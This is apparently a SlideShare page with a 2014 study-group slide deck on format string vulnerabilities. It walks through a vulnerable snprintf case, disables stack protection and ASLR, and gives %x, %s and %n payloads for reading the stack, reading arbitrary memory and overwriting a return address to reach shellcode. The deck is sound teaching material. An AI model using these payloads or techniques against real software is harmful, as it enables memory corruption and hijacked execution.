[MOSUT] Format String Attacks

Aj MaChInE
Aj MaChInE
Format String Attacks AJ 2014.1.18
About Me • Study in National Chung Cheng University • The simulator of 5 axis CNC machine tool • CUDA programming for the collision detection in real time • 若渴計畫 & MOSUT
Outline • Illustrating format string vulnerabilities • A case study • • • • • fsa.c Compile and setup insecure environment Viewing the stack Viewing memory at any location Overwriting of arbitrary memory • So, you can…
Format String Vulnerabilities • format string <->argv[1] • printf(argv[1]) • strcpy(buff,argv[1]) • snprintf(buf,sizeof buf,argv[1]); •… • EX: compile & execute
A Case Study: fsa.c
A Case Study: Compile and Setup Insecure Environment • Compile • gcc -g -Wno-format-security -fno-stack-protector fsa.c • Disable ASLR(address space layout randomization) • sudo sysctl -w kernel.randomize_va_space=0 • X86 machine & Unbuntu 12.04
Stack Status before Executing snpritf() esp ?? ?? ?? x = 97 = ‘a’ buf[100] stack
Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) Buffer length argv[1] pointer ?? b7ff3fec ?? bfffff3b4 c call convention http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html ?? 0 x = 97 = ‘a’ buf[100] Richard Reese,透視c語言指標 p.128
Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) fetch Buffer length argv[1] pointer stack %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]
Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer Buffer length • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) argv[1] pointer ?? b7ff3fec ?? bfffff3b4 ?? 0 copy x = 97 = ‘a’ %x?? Execution order of “copy” and “fetch” are switched by OS buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)
Viewing the Stack: “aaaa.%x.%x.%x.%x.%x” • Format string = aaaa.%x.%x.%x.%x.%x heap “aaaa.%x.%x.%x.% x.%x” Buffer pointer • ‘a’ is 0x61 in ASCII • snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”) Buffer length argv[1] pointer %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]=aaaa.b7ff3f ec.bffff3a4.0.61.6161 6161
Viewing Memory at Any Location • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%s bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8
Overwriting of Arbitrary Memory • The %n field was encountered in the format string • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%n 26(??) alignment bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8 bffff2f8 x = 28 = 0x1c %n buf[0]=bffff2f8
So, You Can… • Format string vulnerabilities • Viewing the stack • Finding return addresses • Overwriting return address • Overwriting return addresses to point to shellcode • EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address
You can overwrite arbitrary memory, if there are format string vulnerabilities
Reference • Tim Newsham, “Format String Attacks” • http://www.thenewsh.com/~newsham/format-string-attacks.pdf • stackoverflow,“How can a Format-String vulnerability be exploited?” • http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited • Paul Haas, Advanced Format String Attacks • http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf • David Brumley, Cource sliedes • http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf • Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf
1 of 16

[MOSUT] Format String Attacks

Download to read offline
Self ImprovementEntertainment & HumorTechnology

一個學習format string attack與分享的故事 Outline: *Illustrating format string vulnerabilities *A case study +fsa.c +Compile and setup insecure environment +Viewing the stack +Viewing Memory at any location +Overwriting of arbitrary memory *So, You Can…

Aj MaChInE
Aj MaChInE

Recommended

2.Format Strings2.Format Strings
2.Format Stringsphanleson
1.7K views41 slides
Control hijackingControl hijacking
Control hijackingG Prachi
14K views23 slides
6 buffer overflows6 buffer overflows
6 buffer overflowsdrewz lin
3.3K views19 slides
Buffer OverflowsBuffer Overflows
Buffer OverflowsSumit Kumar
1.8K views21 slides
Common mistakes in C programmingCommon mistakes in C programming
Common mistakes in C programmingLarion
4.3K views21 slides
Buffer Overflow AttacksBuffer Overflow Attacks
Buffer Overflow Attacksharshal kshatriya
4.8K views11 slides

More Related Content

What's hot

What's hot(19)

Valgrind overview: runtime memory checker and a bit more aka использование #v...Valgrind overview: runtime memory checker and a bit more aka использование #v...
Valgrind overview: runtime memory checker and a bit more aka использование #v...
Minsk Linux User Group1.9K views
Mathematicians: Trust, but VerifyMathematicians: Trust, but Verify
Mathematicians: Trust, but Verify
Andrey Karpov368 views
Антон Бикинеев, Reflection in C++NextАнтон Бикинеев, Reflection in C++Next
Антон Бикинеев, Reflection in C++Next
Sergey Platonov6.1K views
100 bugs in Open Source C/C++ projects 100 bugs in Open Source C/C++ projects
100 bugs in Open Source C/C++ projects
Andrey Karpov1.2K views
Rust LDN 24 7 19 Oxidising the Command LineRust LDN 24 7 19 Oxidising the Command Line
Rust LDN 24 7 19 Oxidising the Command Line
Matt Provost165 views
Weakened Random Oracle Models with Target PrefixWeakened Random Oracle Models with Target Prefix
Weakened Random Oracle Models with Target Prefix
MASAYUKITEZUKA192 views
Price of an ErrorPrice of an Error
Price of an Error
Andrey Karpov1K views
1.Buffer Overflows1.Buffer Overflows
1.Buffer Overflows
phanleson1.7K views
ValgrindValgrind
Valgrind
aidanshribman5.5K views
Tensor comprehensionsTensor comprehensions
Tensor comprehensions
Mr. Vengineer1.2K views
Антон Бикинеев, Writing good std::future&lt; C++ >Антон Бикинеев, Writing good std::future&lt; C++ >
Антон Бикинеев, Writing good std::future&lt; C++ >
Sergey Platonov705 views
20140531 serebryany lecture01_fantastic_cpp_bugs20140531 serebryany lecture01_fantastic_cpp_bugs
20140531 serebryany lecture01_fantastic_cpp_bugs
Computer Science Club476 views
Tiramisu概要Tiramisu概要
Tiramisu概要
Mr. Vengineer787 views
TensorFlow local Python XLA clientTensorFlow local Python XLA client
TensorFlow local Python XLA client
Mr. Vengineer937 views
20140531 serebryany lecture02_find_scary_cpp_bugs20140531 serebryany lecture02_find_scary_cpp_bugs
20140531 serebryany lecture02_find_scary_cpp_bugs
Computer Science Club885 views
Linux on System z debugging with ValgrindLinux on System z debugging with Valgrind
Linux on System z debugging with Valgrind
IBM India Smarter Computing1.6K views
Clang tidyClang tidy
Clang tidy
Yury Yafimachau6.9K views
Handling inline assembly in Clang and LLVMHandling inline assembly in Clang and LLVM
Handling inline assembly in Clang and LLVM
Min-Yih Hsu1.5K views
tick cross gametick cross game
tick cross game
sanobersheir458 views

Viewers also liked

Viewers also liked(10)

Similar to [MOSUT] Format String Attacks

Dynamic memory allocationDynamic memory allocation
Dynamic memory allocationViji B
570 views26 slides

Similar to [MOSUT] Format String Attacks(20)

Go Profiling - John Graham-Cumming Go Profiling - John Graham-Cumming
Go Profiling - John Graham-Cumming
Cloudflare22.3K views
Race-conditions-web-locks-and-shared-memoryRace-conditions-web-locks-and-shared-memory
Race-conditions-web-locks-and-shared-memory
Timur Shemsedinov1K views
JavaOne 2015 Java Mixed-Mode Flame GraphsJavaOne 2015 Java Mixed-Mode Flame Graphs
JavaOne 2015 Java Mixed-Mode Flame Graphs
Brendan Gregg23.1K views
Format String ExploitationFormat String Exploitation
Format String Exploitation
UTD Computer Security Group241 views
Dynamic memory allocationDynamic memory allocation
Dynamic memory allocation
Viji B570 views
FreeBSD 2014 Flame GraphsFreeBSD 2014 Flame Graphs
FreeBSD 2014 Flame Graphs
Brendan Gregg17.8K views
TDOH x 台科 pwn課程TDOH x 台科 pwn課程
TDOH x 台科 pwn課程
Weber Tsai2.6K views
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
Russell Sanford837 views
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Øredev 2011 - JVM JIT for Dummies (What the JVM Does With Your Bytecode When ...
Charles Nutter8.5K views
Vim Script ProgrammingVim Script Programming
Vim Script Programming
Lin Yo-An5.6K views
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
The Best and Worst of Cassandra-stress Tool (Christopher Batey, The Last Pick...
DataStax5.2K views
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
Kafka Summit SF 2017 - One Day, One Data Hub, 100 Billion Messages: Kafka at ...
confluent2.6K views
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
ExperiencesSharingOnEmbeddedSystemDevelopment_20160321
Teddy Hsiung140 views
JavaOne 2012 - JVM JIT for DummiesJavaOne 2012 - JVM JIT for Dummies
JavaOne 2012 - JVM JIT for Dummies
Charles Nutter11K views
Open Source Systems PerformanceOpen Source Systems Performance
Open Source Systems Performance
Brendan Gregg33.4K views
Java Performance Analysis on Linux with Flame GraphsJava Performance Analysis on Linux with Flame Graphs
Java Performance Analysis on Linux with Flame Graphs
Brendan Gregg24.7K views
Web Locks APIWeb Locks API
Web Locks API
Timur Shemsedinov1.8K views
Bottom to Top Stack Optimization with LAMPBottom to Top Stack Optimization with LAMP
Bottom to Top Stack Optimization with LAMP
katzgrau994 views
Bottom to Top Stack Optimization - CICON2011Bottom to Top Stack Optimization - CICON2011
Bottom to Top Stack Optimization - CICON2011
CodeIgniter Conference2.3K views
Unix executable buffer overflowUnix executable buffer overflow
Unix executable buffer overflow
Ammarit Thongthua ,CISSP CISM GXPN CSSLP CCNP4.5K views

More from Aj MaChInE

A study on NetSpectreA study on NetSpectre
A study on NetSpectreAj MaChInE
211 views27 slides

More from Aj MaChInE(12)

An Intro on Data-oriented AttacksAn Intro on Data-oriented Attacks
An Intro on Data-oriented Attacks
Aj MaChInE301 views
A Study on .NET Framework for Red Team - Part IA Study on .NET Framework for Red Team - Part I
A Study on .NET Framework for Red Team - Part I
Aj MaChInE493 views
A study on NetSpectreA study on NetSpectre
A study on NetSpectre
Aj MaChInE211 views
Introduction to Adversary Evaluation ToolsIntroduction to Adversary Evaluation Tools
Introduction to Adversary Evaluation Tools
Aj MaChInE1.2K views
[若渴] A preliminary study on attacks against consensus in bitcoin[若渴] A preliminary study on attacks against consensus in bitcoin
[若渴] A preliminary study on attacks against consensus in bitcoin
Aj MaChInE345 views
[RAT資安小聚] Study on Automatically Evading Malware Detection[RAT資安小聚] Study on Automatically Evading Malware Detection
[RAT資安小聚] Study on Automatically Evading Malware Detection
Aj MaChInE795 views
[若渴] Preliminary Study on Design and Exploitation of Trustzone[若渴] Preliminary Study on Design and Exploitation of Trustzone
[若渴] Preliminary Study on Design and Exploitation of Trustzone
Aj MaChInE281 views
[若渴]Study on Side Channel Attacks and Countermeasures [若渴]Study on Side Channel Attacks and Countermeasures
[若渴]Study on Side Channel Attacks and Countermeasures
Aj MaChInE858 views
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
Aj MaChInE981 views
[若渴計畫] Introduction: Formal Verification for Code[若渴計畫] Introduction: Formal Verification for Code
[若渴計畫] Introduction: Formal Verification for Code
Aj MaChInE718 views
[若渴計畫] Studying ASLR^cache[若渴計畫] Studying ASLR^cache
[若渴計畫] Studying ASLR^cache
Aj MaChInE430 views
[若渴計畫] Black Hat 2017之過去閱讀相關整理[若渴計畫] Black Hat 2017之過去閱讀相關整理
[若渴計畫] Black Hat 2017之過去閱讀相關整理
Aj MaChInE434 views

Recently uploaded

Recently uploaded(8)

Landing a Product Manager Job in Berlin - Top Hard Skills / Top Soft Skills D...Landing a Product Manager Job in Berlin - Top Hard Skills / Top Soft Skills D...
Landing a Product Manager Job in Berlin - Top Hard Skills / Top Soft Skills D...
Bao Nguyen15 views
Personal Presentation.pdfPersonal Presentation.pdf
Personal Presentation.pdf
VictoriaGonzalez9284298 views
suman ppt.pptxsuman ppt.pptx
suman ppt.pptx
Rajkumaryadav28737012 views
Fundamental of FinanceFundamental of Finance
Fundamental of Finance
Bibhudutta Tripathy 7 views
Work-Life Balance Self-AssessmentWork-Life Balance Self-Assessment
Work-Life Balance Self-Assessment
MindGoals.org8 views
Barcelona.pdfBarcelona.pdf
Barcelona.pdf
Fundacja Rozwoju Społeczeństwa Przedsiębiorczego10 views
Personal Presentation.pdfPersonal Presentation.pdf
Personal Presentation.pdf
VictoriaGonzalez9284295 views
Learning Transfer.pptxLearning Transfer.pptx
Learning Transfer.pptx
linzi138 views

[MOSUT] Format String Attacks

  • 2. About Me • Study in National Chung Cheng University • The simulator of 5 axis CNC machine tool • CUDA programming for the collision detection in real time • 若渴計畫 & MOSUT
  • 3. Outline • Illustrating format string vulnerabilities • A case study • • • • • fsa.c Compile and setup insecure environment Viewing the stack Viewing memory at any location Overwriting of arbitrary memory • So, you can…
  • 4. Format String Vulnerabilities • format string <->argv[1] • printf(argv[1]) • strcpy(buff,argv[1]) • snprintf(buf,sizeof buf,argv[1]); •… • EX: compile & execute
  • 6. A Case Study: Compile and Setup Insecure Environment • Compile • gcc -g -Wno-format-security -fno-stack-protector fsa.c • Disable ASLR(address space layout randomization) • sudo sysctl -w kernel.randomize_va_space=0 • X86 machine & Unbuntu 12.04
  • 7. Stack Status before Executing snpritf() esp ?? ?? ?? x = 97 = ‘a’ buf[100] stack
  • 8. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) Buffer length argv[1] pointer ?? b7ff3fec ?? bfffff3b4 c call convention http://descent-incoming.blogspot.tw/2012/11/pascal-call-convention-in-c.html ?? 0 x = 97 = ‘a’ buf[100] Richard Reese,透視c語言指標 p.128
  • 9. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) fetch Buffer length argv[1] pointer stack %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]
  • 10. Viewing the Stack:”%x.%x.%x.%x.%x” heap “%x.%x.%x.%x.%x” • Format string = %x.%x.%x.%x.%x Buffer pointer Buffer length • snprintf(buf, sizeof buf, argv[1]) =>snprintf(buf, sizeof buf, “%x.%x.%x.%x.%x”) argv[1] pointer ?? b7ff3fec ?? bfffff3b4 ?? 0 copy x = 97 = ‘a’ %x?? Execution order of “copy” and “fetch” are switched by OS buf[100]=b7ff3fec. Bfffff3b4. 0.61.66663762(ff7b)
  • 11. Viewing the Stack: “aaaa.%x.%x.%x.%x.%x” • Format string = aaaa.%x.%x.%x.%x.%x heap “aaaa.%x.%x.%x.% x.%x” Buffer pointer • ‘a’ is 0x61 in ASCII • snprintf(buf, sizeof buf, “aaaa.%x.%x.%x.%x.%x”) Buffer length argv[1] pointer %x ?? b7ff3fec %x ?? bfffff3b4 %x ?? 0 %x x = 97 = ‘a’ %x buf[100]=aaaa.b7ff3f ec.bffff3a4.0.61.6161 6161
  • 12. Viewing Memory at Any Location • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%x • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%s bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8
  • 13. Overwriting of Arbitrary Memory • The %n field was encountered in the format string • Format string = $(printf “xf8xf2xffxbf”).%x.%x.%x.%x.%n 26(??) alignment bffff2f8 x = 97 = ‘a’ %s buf[0]=bffff2f8 bffff2f8 x = 28 = 0x1c %n buf[0]=bffff2f8
  • 14. So, You Can… • Format string vulnerabilities • Viewing the stack • Finding return addresses • Overwriting return address • Overwriting return addresses to point to shellcode • EX: $ ./a.out $(printf “return address”).%x.%x.%x.%x.%n => retrun address = 28 $ ./a.out $(printf “return address”).%x.%x.%x.%4x.%n => retrun address = 30 $ ./a.out $(printf “return address”).%x.%x.%x.%8x.%n => retrun address = 34 $ ./a.out $(printf “return address”).%Xx.%Yx.%Zx.%Ax.%n => retrun address = shellcode address
  • 15. You can overwrite arbitrary memory, if there are format string vulnerabilities
  • 16. Reference • Tim Newsham, “Format String Attacks” • http://www.thenewsh.com/~newsham/format-string-attacks.pdf • stackoverflow,“How can a Format-String vulnerability be exploited?” • http://stackoverflow.com/questions/7459630/how-can-a-format-string-vulnerabilitybe-exploited • Paul Haas, Advanced Format String Attacks • http://www.defcon.org/images/defcon-18/dc-18-presentations/Haas/DEFCON-18Haas-Adv-Format-String-Attacks.pdf • David Brumley, Cource sliedes • http://users.ece.cmu.edu/~dbrumley/courses/18739c-s11/slides/0127.pdf • Scut et al,”Exploiting Format String Vulnerabilities” • http://crypto.stanford.edu/cs155/papers/formatstring-1.2.pdf